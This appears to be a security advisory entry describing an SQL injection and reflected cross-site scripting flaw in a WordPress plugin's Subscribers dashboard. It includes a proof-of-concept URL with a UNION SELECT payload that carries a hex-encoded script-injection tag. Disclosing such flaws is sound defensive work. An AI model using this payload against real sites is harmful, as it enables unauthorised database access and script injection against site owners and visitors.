The plugin does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=%22+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e+--+g
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-27 (about 1 years ago)
2021-12-27 (about 1 years ago)
2022-04-13 (about 9 months ago)